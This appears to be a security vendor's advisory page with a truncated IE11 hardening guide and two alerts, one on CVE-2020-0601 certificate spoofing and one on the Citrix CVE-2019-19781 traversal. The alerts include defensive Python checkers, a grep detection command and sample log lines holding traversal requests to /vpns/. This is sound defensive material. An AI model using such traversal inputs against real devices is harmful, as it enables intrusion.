    In situations where IE must be used due to legacy needs, Blumira recommends limiting the sites that IE can access. Doing so significantly reduces the risk to your environment, which is inherently increased by retaining IE for browsing. This change does not restrict all browsers, only IE, so that IE is used only for specific needs rather than general browsing.

    We are assuming that you are on IE11 and likely have a newer DC in place, which changes how IE is customized within environments. Any server with IE10 is EOL and should be replaced ASAP; there is an IEAK for IE10, but it really should be avoided if possible.

    1. Download the Internet Explorer Administration Kit 11 from Microsoft; the MSI\en-us\ieak.msi version is likely the one you’re looking for.
      https://www.microsoft.com/en-us/download/details.aspx?id=40903
    2. Install the downloaded ieak.msi onto your DC or a related controller server for your internal use.
    3. Open the Internet Explorer Customization Wizard 11, step through the initial setup process and leave the default storage location.
    4. You will get to the Platform Selection page, you will need to complete this process for every OS platform separately.
    5. Process per Platform:



    Critical
    January 14, 2020

    Windows Certificate Spoofing Vulnerability

    Microsoft Security

    What Happened

    Today (2020-01-14) Microsoft announced that Patch Tuesday would include a fix for CVE-2020-0601, a critical bug in CryptAPI.dll. This bug allows attackers to spoof certificates that use Elliptic Curve Cryptography on Windows 10 and Windows Server 2016/2019 endpoints.

    Is All Security Broken?

    No! This attack requires a significant foothold in an environment and is not something you would commonly see in the wild, unlike ransomware. While the NSA is stating that this allows remote code execution, that is only intended to convey that you could potentially install an update or binary that has been modified by a man-in-the-middle attack or signed with a spoofed certificate.

    This is not a worm that is going to destroy networks, but rather a spoofing vulnerability that would allow an attacker – likely a nation-state APT – to surveil network infrastructure, steal secrets, and generally spy on vulnerable machines. As this develops into a public exploit it poses a significant risk to environments; however, the initial targets for this attack are largely going to be government, military, some industrial, and very large organizations with sensitive data.
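    The spoofing described above depends on how a certificate's elliptic-curve public key is expressed: a key that names a standard curve by OID can be matched against a trusted root unambiguously, while one that ships its own explicit curve parameters cannot be trusted on the key bytes alone. The following is an added example, not code from the Blumira alert or from Microsoft: a minimal DER walker that classifies the EC parameters in an X.509 SubjectPublicKeyInfo and refuses explicit parameters or unknown named curves. The sample SPKI blobs are constructed inline with placeholder key bytes and are not real certificates; the OID constants are the standard values from RFC 5480.

```python
"""Classify the EC parameters carried in a DER SubjectPublicKeyInfo (added example).

Accepts only keys that reference a trusted named curve by OID; rejects keys that
carry explicit curve parameters, which is the encoding a CVE-2020-0601 style
spoof relies on. All sample blobs below are constructed placeholders.
"""
from typing import List, Tuple

# OID content bytes (the part after the 0x06 tag and length), from RFC 5480.
ID_EC_PUBLIC_KEY = bytes.fromhex("2a8648ce3d0201")      # 1.2.840.10045.2.1
ID_PRIME_FIELD = bytes.fromhex("2a8648ce3d0101")        # 1.2.840.10045.1.1
RSA_ENCRYPTION = bytes.fromhex("2a864886f70d010101")    # 1.2.840.113549.1.1.1
TRUSTED_NAMED_CURVES = {
    bytes.fromhex("2a8648ce3d030107"): "secp256r1",     # 1.2.840.10045.3.1.7
    bytes.fromhex("2b81040022"): "secp384r1",           # 1.3.132.0.34
    bytes.fromhex("2b81040023"): "secp521r1",           # 1.3.132.0.35
}


def der_read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one DER TLV (single-byte tag, definite length); return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long-form length: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def der_children(value: bytes) -> List[Tuple[int, bytes]]:
    """Split the content of a SEQUENCE into its (tag, value) members."""
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = der_read_tlv(value, pos)
        out.append((tag, val))
    return out


def der_tlv(tag: int, value: bytes) -> bytes:
    """Encode one TLV; used here only to build the constructed samples."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def classify_spki(spki: bytes) -> Tuple[str, str]:
    """Return (verdict, detail): verdict is 'accept', 'reject' or 'not-ec'."""
    tag, body, _ = der_read_tlv(spki, 0)
    if tag != 0x30:
        return "reject", "SubjectPublicKeyInfo is not a SEQUENCE"
    members = der_children(body)
    if len(members) < 2 or members[0][0] != 0x30:
        return "reject", "malformed AlgorithmIdentifier"
    fields = der_children(members[0][1])
    if not fields or fields[0][0] != 0x06:
        return "reject", "algorithm OID missing"
    if fields[0][1] != ID_EC_PUBLIC_KEY:
        return "not-ec", "not an EC public key"
    if len(fields) < 2:
        return "reject", "EC parameters absent"
    ptag, pval = fields[1]
    if ptag == 0x06:                        # namedCurve: compare against the trusted set only
        name = TRUSTED_NAMED_CURVES.get(pval)
        return ("accept", name) if name else ("reject", "named curve not in trusted set")
    if ptag == 0x30:                        # ecParameters SEQUENCE: attacker-chosen curve data
        return "reject", "explicit EC parameters are not accepted"
    return "reject", "implicitlyCA parameters are not accepted"


def _spki(alg_oid: bytes, alg_params: bytes, key_bits: bytes) -> bytes:
    """Build a constructed SubjectPublicKeyInfo around placeholder key bits."""
    alg_id = der_tlv(0x30, der_tlv(0x06, alg_oid) + alg_params)
    return der_tlv(0x30, alg_id + der_tlv(0x03, b"\x00" + key_bits))


PLACEHOLDER_POINT = b"\x04" + b"\x11" * 64   # constructed; not a real P-256 point
SPKI_NAMED_P256 = _spki(ID_EC_PUBLIC_KEY,
                        der_tlv(0x06, bytes.fromhex("2a8648ce3d030107")), PLACEHOLDER_POINT)
# Explicit form: SEQUENCE { version, fieldID, curve {a, b}, base, order }; placeholder values.
EXPLICIT_PARAMS = der_tlv(0x30,
                          der_tlv(0x02, b"\x01")
                          + der_tlv(0x30, der_tlv(0x06, ID_PRIME_FIELD) + der_tlv(0x02, b"\x17"))
                          + der_tlv(0x30, der_tlv(0x04, b"\x01") + der_tlv(0x04, b"\x01"))
                          + der_tlv(0x04, b"\x04\x02\x03")
                          + der_tlv(0x02, b"\x05"))
SPKI_EXPLICIT = _spki(ID_EC_PUBLIC_KEY, EXPLICIT_PARAMS, PLACEHOLDER_POINT)
SPKI_RSA = _spki(RSA_ENCRYPTION, der_tlv(0x05, b""), b"\x30\x03\x02\x01\x03")

if __name__ == "__main__":
    for label, blob in (("named", SPKI_NAMED_P256), ("explicit", SPKI_EXPLICIT), ("rsa", SPKI_RSA)):
        print(label, classify_spki(blob))
```

    The walker deliberately stops at the tag of the parameters field: a verifier that only compares the public-key point against a cached trusted key, without also confirming the curve is the expected named one, is exactly what the fix hardens. Real deployments should run this check on the DER of the issuer's SPKI pulled from the certificate chain, not on standalone samples.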

    What Should I Do?

    This report also came with warnings from the NSA and a large amount of FUD about how patching must happen immediately. Blumira urges caution with regard to breaking your usual patching routine, and instead recommends speeding up any patch phasing that normally takes place.

    Because the patch is rolling out publicly, the InfoSec community will start to reverse engineer the changes in CryptAPI.dll. This will result in a working exploit against unpatched machines; the question is largely how long that will take. It’s unlikely that a functional exploit will be active in the wild immediately; it will more likely take days to weeks to filter out.

    With that in mind, and given the lack of quality associated with recent Windows patches, we recommend completing your patching within the next week with appropriate pre-patch testing. Additionally, this patch covers three new RDP vulnerabilities, some of which affect Windows 7, and these should also be applied, as this was the last patch cycle for the Windows 7/2012 R2 series prior to it entering End of Life.

    We generally agree with the NSA recommendations regarding patching priority, with some modifications. Our recommended patching priority:

    1. Web Appliances and Servers
    2. Proxies, although unlikely to be Windows based
    3. Endpoints that handle critical services, e.g., DCs, DNS, WSUS, VPN, IPSec if Windows based.
    4. Endpoints that are directly exposed to the internet
    5. Endpoints of privileged users
    6. Endpoints of users that access sensitive information
    7. All other Endpoints

    By 2020-01-21, all Windows 10 and Windows Server 2016/2019 systems should be patched for CVE-2020-0601. Since the phased update process should already be under way, the rollout can be accelerated if a public exploit becomes available.

    Critical
    January 13, 2020

    What is the Citrix Gateway exploit? How should I respond?

    Exploits Released for Citrix Application Delivery Controller (ADC) and Citrix Gateways

    This weekend two proof-of-concept exploits were made publicly available, released 23 days after initial discovery, much earlier than the expected 30-90 day disclosure deadline.

    Due to this public release of exploits, attackers have added these attacks to their toolkits and are ramping up quickly. If you use affected Citrix technologies and have not applied the mitigations yet, you must do so immediately.

    Citrix ADC and Gateway of the specific versions detailed below were found to be vulnerable to a directory traversal in late December 2019 and given a CVE identifier – CVE-2019-19781 – Vulnerability in Citrix Application Delivery Controller and Citrix Gateway. This meant that an attacker could potentially run authenticated commands against your Citrix devices due to the directory traversal vulnerability.

    At that point there was no exploit available, and Citrix had released mitigations for affected versions (Mitigation Steps for CVE-2019-19781). There were discussions between researchers about the potential of this vulnerability, but no examples were publicly available.

    How can this exploit be used?

    An attacker is able to exploit the Citrix device through a vulnerable path to run any program, gather any data, or run any command on the device. The reliability of this attack will vary depending on what the attacker is attempting to do, e.g., establish persistent remote access versus retrieve the contents of your running config.

    Scanning and attack traffic associated with this threat has already grown and will continue to do so. This could allow an attacker to access your Citrix environment, extract your configs along with the secrets they contain, and run arbitrary code on the device.

    How Would I Know if I’m being targeted and What Should I Do?

    If you are vulnerable and an attack is detected, you should change secrets and restore from a backup taken prior to the attack. If you are vulnerable but no attack was detected, you should be safe but must apply the mitigations: https://support.citrix.com/article/CTX267679.

    This attack can be detected through request logs, as it requires the attacker to attempt to access the /vpns/ path on your Citrix device. Any Blumira customers where this path attempt was detected have been notified. However, if Blumira does not have visibility into your Citrix environment, you may need to check request logs at your firewalls and on the Citrix device itself. You can run the following command against your Citrix device over SSH to grep the HTTP request logs and determine whether such requests occurred:

    ssh -t yoursshuser@address 'grep -r "/../vpns/" /var/log/http*'
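    The grep above matches the literal "/../vpns/" string. As an added example, not code from the Blumira alert or from Citrix, the scanner below does the same check over exported access-log lines in Python, and goes one step further: it decodes percent-encoding before looking for a ".." segment in front of /vpns/, and separately reports requests that reach /vpns/ directly. The log lines are constructed in combined-log style with documentation IP addresses and placeholder paths; they are not captured traffic.

```python
"""Scan HTTP access-log lines for requests that reach /vpns/ (added example).

Flags two conditions described in the alert: a ".." traversal segment leading
to /vpns/ ("traversal"), and any other request touching /vpns/ ("vpns").
Percent-encoding is undone first so encoded dots are not missed. All sample
lines below are constructed, not real traffic.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Combined-log request field: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalize_path(target: str) -> str:
    """Drop the query string and undo up to three layers of percent-encoding."""
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_path(path: str) -> str:
    """Return 'traversal', 'vpns', or '' (benign) for a decoded request path."""
    lowered = path.lower()
    if "/vpns/" not in lowered:          # "/vpns-docs/" and similar do not match
        return ""
    if ".." in lowered.split("/"):       # a real ".." segment, not just dots in a name
        return "traversal"
    return "vpns"


def scan_http_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per suspicious line, in log order."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue                     # not a request line we understand; skip quietly
        path = normalize_path(match.group("target"))
        severity = classify_path(path)
        if severity:
            findings.append({
                "line": number,
                "client": line.split(" ", 1)[0],
                "method": match.group("method"),
                "path": path,
                "severity": severity,
            })
    return findings


def suspicious_clients(findings: List[Dict[str, object]]) -> List[str]:
    """Sorted, de-duplicated source addresses worth blocking or investigating."""
    return sorted({str(f["client"]) for f in findings})


# Constructed sample log (documentation addresses, placeholder paths).
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Jan/2020:03:21:07 +0000] "GET /vpn/index.html HTTP/1.1" 200 1234',
    '198.51.100.7 - - [11/Jan/2020:03:21:09 +0000] "GET /vpn/../vpns/PLACEHOLDER HTTP/1.1" 200 57',
    '198.51.100.7 - - [11/Jan/2020:03:21:10 +0000] "GET /vpn/%2e%2e/vpns/PLACEHOLDER?x=1 HTTP/1.1" 200 57',
    '203.0.113.9 - - [11/Jan/2020:03:22:41 +0000] "POST /vpns/portal/PLACEHOLDER HTTP/1.1" 200 0',
    '10.0.0.6 - - [11/Jan/2020:03:23:00 +0000] "GET /vpns-docs/readme HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan_http_log(SAMPLE_LOG):
        print(finding)
    print("clients:", suspicious_clients(scan_http_log(SAMPLE_LOG)))
```

    Run it over the files the grep above reads (/var/log/http*) after copying them off the device; a "traversal" finding is the signal the alert describes, while a bare "vpns" finding from an address that is not one of your own management hosts still merits a look.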

    Am I Impacted by the Citrix Vulnerability?

    The following Citrix devices are affected by this vulnerability and must be mitigated immediately – https://support.citrix.com/article/CTX267679.

    • Citrix ADC and Citrix Gateway version 13.0 all supported builds
    • Citrix ADC and NetScaler Gateway version 12.1 all supported builds
    • Citrix ADC and NetScaler Gateway version 12.0 all supported builds
    • Citrix ADC and NetScaler Gateway version 11.1 all supported builds
    • Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

    When is a fix expected by Citrix?

    Right now Citrix does not have a patch for this vulnerability and only has target dates for its release. The affected code is likely a core component of the device, and fixing it has had unforeseen consequences that require re-engineering, forcing a slower release. Blumira will notify affected organizations when the related patch is available for their affected device.

    Version   Refresh Build   Expected Release Date
    10.5      10.5.70.x       31st January 2020
    11.1      11.1.63.x       20th January 2020
    12.0      12.0.63.x       20th January 2020
    12.1      12.1.55.x       27th January 2020
    13.0      13.0.47.x       27th January 2020
